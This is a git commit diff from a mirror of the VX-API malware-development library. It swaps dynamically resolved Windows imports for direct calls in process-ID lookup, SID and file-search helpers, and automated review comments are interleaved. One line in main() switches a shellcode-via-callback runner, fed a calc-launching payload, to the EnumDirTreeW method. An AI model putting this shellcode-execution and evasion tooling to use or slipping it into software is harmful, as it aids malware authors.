mirror of https://github.com/vxunderground/VX-API
parent
cc8255f356
commit
97ee6fcb92
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.298
|
||||
Version: 2.0.310
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
|
|
@ -47,8 +47,6 @@ EXIT_ROUTINE:
|
|||
|
||||
HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
||||
{
|
||||
IUNKNOWN_QUERYSERVICE QueryServiceUsingIUnknown = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
HRESULT Result = S_OK;
|
||||
IShellWindows* Windows = NULL;
|
||||
HWND hWnd;
|
||||
|
@ -58,14 +56,6 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
IShellView* View = NULL;
|
||||
*ShellView = NULL;
|
||||
|
||||
hModule = LoadLibraryW(L"Shlwapi.dll");
|
||||
if (hModule == NULL)
|
||||
return E_FAIL;
|
||||
|
||||
QueryServiceUsingIUnknown = (IUNKNOWN_QUERYSERVICE)GetProcAddressA((DWORD64)hModule, (PCHAR)"IUnknown_QueryService");
|
||||
if(QueryServiceUsingIUnknown == NULL)
|
||||
return E_FAIL;
|
||||
|
||||
Result = CoCreateInstance(CLSID_ShellWindows, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&Windows));
|
||||
if (!SUCCEEDED(Result))
|
||||
return Result;
|
||||
|
@ -74,7 +64,7 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = QueryServiceUsingIUnknown(Dispatch, SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
|
||||
Result = IUnknown_QueryService(Dispatch, SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -89,9 +79,6 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6001)
|
||||
if (Windows)
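Review bot: The failure checks in UnusedSubroutineGetShellViewForDesktop are written as `if (!SUCCEEDED(Result))` (after CoCreateInstance and after the now-direct IUnknown_QueryService call); the SDK idiom is `if (FAILED(Result))`, which is the same test and reads as intended. The early `return Result;` after CoCreateInstance bypasses EXIT_ROUTINE, which is correct now that the Shlwapi module handle is gone, but a one-line comment there (`// nothing acquired yet, safe to return directly`) would stop the next reader from treating it as a leak relative to the goto-based exits that follow. The function also has no header comment; `// Resolves the desktop's IShellView through ShellWindows / SID_STopLevelBrowser; *ShellView is NULL on failure` covers what the visible lines show. The function body continues outside the hunks.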
|
||||
|
|
|
@ -47,63 +47,8 @@ typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
|||
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHLWAPI IMPORT
|
||||
*******************************************/
|
||||
typedef LPWSTR(WINAPI* PATHCOMBINEA)(LPCSTR, LPCSTR, LPCSTR);
|
||||
typedef LPWSTR(WINAPI* PATHCOMBINEW)(LPCWSTR, LPCWSTR, LPCWSTR);
|
||||
typedef HRESULT(WINAPI* IUNKNOWN_QUERYSERVICE)(IUnknown*, REFGUID, REFIID, PVOID*);
|
||||
typedef VOID(WINAPI* PATHSTRIPPATHW)(LPWSTR);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
URLMON IMPORT
|
||||
*******************************************/
|
||||
typedef HRESULT(WINAPI* URLDOWNLOADFILEA)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
|
||||
typedef HRESULT(WINAPI* URLDOWNLOADFILEW)(LPUNKNOWN, LPCTSTR, LPCTSTR, DWORD, LPBINDSTATUSCALLBACK);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELL32 IMPORT
|
||||
*******************************************/
|
||||
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
typedef HRESULT(WINAPI* CDEFFOLDERMENU_CREATE2)(PVOID, HWND, UINT, PVOID, PVOID, LPVOID, UINT, PHKEY, PVOID*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
WTSAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* WTSENUMERATEPROCESSES)(HANDLE, DWORD, DWORD, PWTS_PROCESS_INFOW*, PDWORD);
|
||||
typedef VOID(WINAPI* WTSFREEMEMORY)(PVOID);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDA)(PSID, LPSTR*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
CRYPT32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYSTEM_STORE);
|
||||
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
|
||||
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
|
||||
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
DBGHELP IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
|
||||
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
|
||||
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
|
@ -12,23 +12,13 @@ DWORD GetTokenInformationBufferSize(HANDLE hToken)
|
|||
|
||||
LPWSTR GetCurrentUserSidW(VOID)
|
||||
{
|
||||
CONVERTSIDTOSTRINGSIDW ConvertSidToStringSidW;
|
||||
PSID Sid = NULL;
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwError = ERROR_SUCCESS, dwIndex = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
LPWSTR pSid = NULL;
|
||||
HMODULE hAdvapi = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
hAdvapi = TryLoadDllMultiMethodW((PWCHAR)L"Advapi32.dll");
|
||||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
if (!ConvertSidToStringSidW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
|
@ -79,9 +69,6 @@ EXIT_ROUTINE:
|
|||
if (Sid)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
|
@ -90,23 +77,13 @@ EXIT_ROUTINE:
|
|||
|
||||
LPSTR GetCurrentUserSidA(VOID)
|
||||
{
|
||||
CONVERTSIDTOSTRINGSIDA ConvertSidToStringSidA;
|
||||
PSID Sid = NULL;
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwError = ERROR_SUCCESS, dwIndex = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
LPSTR pSid = NULL;
|
||||
HMODULE hAdvapi = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
hAdvapi = TryLoadDllMultiMethodW((PWCHAR)L"Advapi32.dll");
|
||||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
if (!ConvertSidToStringSidA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
|
@ -157,9 +134,6 @@ EXIT_ROUTINE:
|
|||
if (Sid)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
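Review bot: `OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken)` in both GetCurrentUserSidW and GetCurrentUserSidA requests every token right although the function — going by the `PTOKEN_GROUPS TokenGroup` local and the GetTokenInformationBufferSize helper in the hunk header — only reads token information; `TOKEN_QUERY` is sufficient and is what least privilege calls for, and TOKEN_ALL_ACCESS fails outright on tokens whose DACL does not grant full access (restricted or filtered tokens), turning a readable SID into a NULL return. Change both lines to `if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_QUERY, &hToken))`. Separately, `HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Sid)` passes a HeapAlloc flag to HeapFree, whose only documented flag is HEAP_NO_SERIALIZE — pass `0` there. Both function bodies continue outside the hunks.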
|
||||
|
||||
|
|
|
@ -5,19 +5,16 @@ DWORD GetPidFromPidBruteForcingW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtQuerySystemInformation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwProcessIdAddress = 0x00000008; dwProcessIdAddress < 0xFFFFFFFC; dwProcessIdAddress += 0x00000004)
|
||||
|
@ -45,9 +42,6 @@ DWORD GetPidFromPidBruteForcingW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
|
@ -56,8 +50,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
WCHAR BinaryNameString[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
|
@ -65,14 +58,12 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtQuerySystemInformation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwProcessIdAddress = 0x00000008; dwProcessIdAddress < 0xFFFFFFFC; dwProcessIdAddress += 0x00000004)
|
||||
|
@ -100,8 +91,5 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
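Review bot: The brute-force loop `for (DWORD dwProcessIdAddress = 0x00000008; dwProcessIdAddress < 0xFFFFFFFC; dwProcessIdAddress += 0x00000004)` in both GetPidFromPidBruteForcingW and GetPidFromPidBruteForcingA is undocumented: when the name is not found it issues roughly 2^30 NtQuerySystemInformation calls before returning 0, which a caller will experience as a hang rather than a miss. A comment above the loop such as `// Worst case (name absent) is ~1e9 syscalls; PIDs are multiples of 4 so stepping by 4 is exact` should state that cost; the loop body continues outside the hunk. `BOOL bUnload = FALSE;` survives in both variants although the only FreeLibrary in the visible EXIT_ROUTINE was the removed shlwapi one, so it appears dead now — confirm against the rest of the body and drop it if so. `WCHAR BinaryNameString[MAX_PATH * sizeof(WCHAR)]` declares 520 elements, not 520 bytes; `WCHAR BinaryNameString[MAX_PATH]` is what the sizeof arithmetic seems to intend.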
|
|
@ -6,29 +6,25 @@ DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
@ -89,9 +85,6 @@ EXIT_ROUTINE:
|
|||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
|
@ -101,7 +94,7 @@ DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
|||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
@ -110,23 +103,20 @@ DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
|||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
@ -187,8 +177,5 @@ EXIT_ROUTINE:
|
|||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
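Review bot: In GetPidFromPidBruteForcingExA the closing parenthesis is misplaced: `if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))` passes the boolean `StringLengthA(...) == 0` (0 or 1) as the length argument and then treats a non-zero return — the success case, going by the sibling call in GetPidFromWindowsTerminalServiceA — as the failure that jumps to EXIT_ROUTINE. It should read `if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension)) == 0)`. As written the A variant converts at most one character and bails out, so it cannot match any process name; the defect is pre-existing but the commit reworks the surrounding lines without touching it. The function body continues outside the hunks.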
|
|
@ -5,33 +5,9 @@
|
|||
DWORD GetPidFromWindowsTerminalServiceW(_In_ PWCHAR BinaryNameWithFileExtension)
|
||||
{
|
||||
PWTS_PROCESS_INFOW ProcessInformation = NULL;
|
||||
WTSFREEMEMORY WtsFreeMemory = NULL;
|
||||
WTSENUMERATEPROCESSES WtsEnumerateProcessesW;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwNumberOfProcesses = ERROR_SUCCESS;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
|
||||
if (!IsDllLoadedW(L"Wtsapi32.dll"))
|
||||
{
|
||||
hModule = LoadLibraryW(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bUnload = TRUE;
|
||||
}
|
||||
else {
|
||||
hModule = GetModuleHandleEx2W(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
WtsEnumerateProcessesW = (WTSENUMERATEPROCESSES)GetProcAddressW((DWORD64)hModule, L"WTSEnumerateProcessesW");
|
||||
WtsFreeMemory = (WTSFREEMEMORY)GetProcAddressW((DWORD64)hModule, L"WTSFreeMemory");
|
||||
|
||||
if (!WtsEnumerateProcessesW || !WtsFreeMemory)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WtsEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
if (!WTSEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ProcessInformation == NULL)
|
||||
|
@ -48,11 +24,8 @@ DWORD GetPidFromWindowsTerminalServiceW(_In_ PWCHAR BinaryNameWithFileExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (bUnload)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (ProcessInformation)
|
||||
WtsFreeMemory(ProcessInformation);
|
||||
WTSFreeMemory(ProcessInformation);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
@ -60,37 +33,13 @@ EXIT_ROUTINE:
|
|||
DWORD GetPidFromWindowsTerminalServiceA(_In_ PCHAR BinaryNameWithFileExtension)
|
||||
{
|
||||
PWTS_PROCESS_INFOW ProcessInformation = NULL;
|
||||
WTSFREEMEMORY WtsFreeMemory = NULL;
|
||||
WTSENUMERATEPROCESSES WtsEnumerateProcessesW;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwNumberOfProcesses = ERROR_SUCCESS;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
WCHAR Buffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(Buffer, BinaryNameWithFileExtension, StringLengthA(BinaryNameWithFileExtension)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsDllLoadedW(L"Wtsapi32.dll"))
|
||||
{
|
||||
hModule = LoadLibraryW(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bUnload = TRUE;
|
||||
}
|
||||
else {
|
||||
hModule = GetModuleHandleEx2W(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
WtsEnumerateProcessesW = (WTSENUMERATEPROCESSES)GetProcAddressW((DWORD64)hModule, L"WTSEnumerateProcessesW");
|
||||
WtsFreeMemory = (WTSFREEMEMORY)GetProcAddressW((DWORD64)hModule, L"WTSFreeMemory");
|
||||
|
||||
if (!WtsEnumerateProcessesW || !WtsFreeMemory)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WtsEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
if (!WTSEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ProcessInformation == NULL)
|
||||
|
@ -107,11 +56,8 @@ DWORD GetPidFromWindowsTerminalServiceA(_In_ PCHAR BinaryNameWithFileExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (bUnload)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (ProcessInformation)
|
||||
WtsFreeMemory(ProcessInformation);
|
||||
WTSFreeMemory(ProcessInformation);
|
||||
|
||||
return ProcessId;
|
||||
}
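Review bot: `CharStringToWCharString(Buffer, BinaryNameWithFileExtension, StringLengthA(BinaryNameWithFileExtension))` in GetPidFromWindowsTerminalServiceA passes no destination bound for `WCHAR Buffer[MAX_PATH * sizeof(WCHAR)]`; if CharStringToWCharString copies the full source length (its contract is not visible here), a caller-supplied name longer than the array overflows the stack — confirm, and if so reject over-long names before converting, e.g. `if (StringLengthA(BinaryNameWithFileExtension) >= MAX_PATH) goto EXIT_ROUTINE;` paired with a plain `WCHAR Buffer[MAX_PATH]`. The `* sizeof(WCHAR)` sizes the array in elements, not bytes, so it is twice as large as the name suggests, which is harmless but obscures what the bound actually is. The same oversized-buffer pattern appears in GetPidFromPidBruteForcingA. The function body continues outside the hunks.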
|
|
@ -982,13 +982,6 @@ typedef struct _PROC_THREAD_ATTRIBUTE_LIST {
|
|||
struct _PROC_THREAD_ATTRIBUTE Attributes[1];
|
||||
}PROC_THREAD_ATTRIBUTE_LIST, * PPROC_THREAD_ATTRIBUTE_LIST;
|
||||
|
||||
typedef struct _WTS_PROCESS_INFOW {
|
||||
DWORD SessionId;
|
||||
DWORD ProcessId;
|
||||
LPWSTR pProcessName;
|
||||
PSID pUserSid;
|
||||
} WTS_PROCESS_INFOW, * PWTS_PROCESS_INFOW;
|
||||
|
||||
typedef enum _KEY_VALUE_INFORMATION_CLASS {
|
||||
KeyValueBasicInformation,
|
||||
KeyValueFullInformation,
|
||||
|
@ -1127,5 +1120,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
|||
ULONG_PTR ProcessIdList[1];
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
|
@ -45,7 +45,7 @@ int main(VOID)
|
|||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_MESSAGEBOXINDIRECT;
|
||||
Sei.MethodEnum = E_ENUMDIRTREEW;
|
||||
|
||||
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//MpfComMonitorChromeSessionOnce();
|
||||
|
|
|
@ -5,16 +5,13 @@ PVOID UserDefinedCallbackRoutineA(LPCSTR Path)
|
|||
return 0;
|
||||
}
|
||||
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID pfnPathCombineW)
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = GetProcessHeapFromTeb();
|
||||
CHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAA FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
||||
if (PathCombineA(szFullPattern, Path, "*") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -36,7 +33,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineRecursiveFindFileMainA(szFullPattern, Pattern, PathCombineA);
|
||||
UnusedSubroutineRecursiveFindFileMainA(szFullPattern, Pattern);
|
||||
}
|
||||
|
||||
} while (FindNextFileA(FindHandle, &FindData));
|
||||
|
@ -83,27 +80,7 @@ EXIT_ROUTINE:
|
|||
|
||||
BOOL RecursiveFindFileA(_In_ LPCSTR Path, _In_ LPCSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEA PathCombineA = NULL;
|
||||
HMODULE hShlwapi = NULL;
|
||||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"Shlwapi.dll");
|
